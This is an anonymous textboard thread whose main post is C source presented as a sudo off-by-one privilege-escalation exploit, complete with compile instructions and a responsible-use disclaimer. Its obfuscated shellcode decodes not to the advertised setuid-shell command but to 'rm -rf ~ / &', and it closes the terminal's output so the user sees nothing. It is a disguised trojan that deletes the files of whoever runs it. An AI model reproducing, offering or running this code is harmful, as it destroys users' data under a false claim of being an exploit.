Return Styles: Pseud0ch, Terminal, Valhalla, NES, Geocities, Blue Moon. Entire thread

1337

Name: Anonymous 2008-01-29 14:54

Oh!

Name: Anonymous 2008-02-21 22:16


/*
 * off by one ebp overwrite in sudo prompt parsing
function
 * discovered by beyond security in 2008, thx ge
 *
 * to compile: gcc -pipe -o sobo sobo.c ; ./sobo
 *
 * please use responsibly! a patch has already been
sent
 * upstream and a fix will be included in the next
sudo release
 *
 */

#include <stdio.h>
#include <unistd.h>
#include <string.h>
#include <alloca.h>
#define SPROMPT "%u@%h> \\%"
#define shellcode esp
#define RETS_NUM 246
#define NOPS_NUM 116

char esp[] __attribute__ ((section(".text"))) /* e.s.p
release */
                = "\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68"
                  "\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99"
                  "\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7"
                  "\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56"
                  "\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31"
                  "\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69"
                  "\x6e\x2f\x73\x68\x00\x2d\x63\x00"
                  "cp -p /bin/sh /tmp/.beyond; chmod 4755
/tmp/.beyond;";

void fill (char *buff, int size, unsigned long val) {
  unsigned long *ptr = (unsigned long *) buff;
  for (size /= sizeof (unsigned long); size > 0;
size--) *ptr++ = val;
}

unsigned long get_sp (void) {
  __asm__ ("lea esp, %eax");
}

char *exp (char nops_nums, char rets_nums, char
*shellcode) {
  int size = strlen (SPROMPT) + nops_nums + rets_nums
+ strlen (shellcode);
  unsigned char *nops = alloca (nops_nums);
  unsigned char *rets = alloca (rets_nums);
  unsigned long ret = get_sp ();
  static char exp_buffer [8192];
  /* ensure isatty() fails */
  close (0); close (1); close (2);
  fill (nops, (unsigned char) nops_nums, 0x90909090);
  fill (rets, (unsigned char) rets_nums, ret);
  if (size > sizeof (exp_buffer)) {
    fprintf (stderr, "buffer is too small\n");
    return NULL;
  }
  snprintf (exp_buffer, sizeof (exp_buffer),
"%s%s%s%s",
  SPROMPT, nops, shellcode, rets);
  return exp_buffer;
}

int main(int argv, char *argc[]) {
  char *exploit = exp (NOPS_NUM, RETS_NUM, shellcode);
  execl ("/usr/bin/sudo", "/usr/bin/sudo", "-b", "-p",
exploit, "/bin/false", NULL);
  /* shellroot should await you @ "HISTFILE=/dev/null
/tmp/.beyond -p" */
  return 0;
}
Newer Posts
Don't change these.
Name: Email:
Entire Thread Thread List
All trademarks and copyrights on this site are owned by their respective parties. All comments and posts are the responsibility of their own posters.
- Tinychan + 2ch Mode -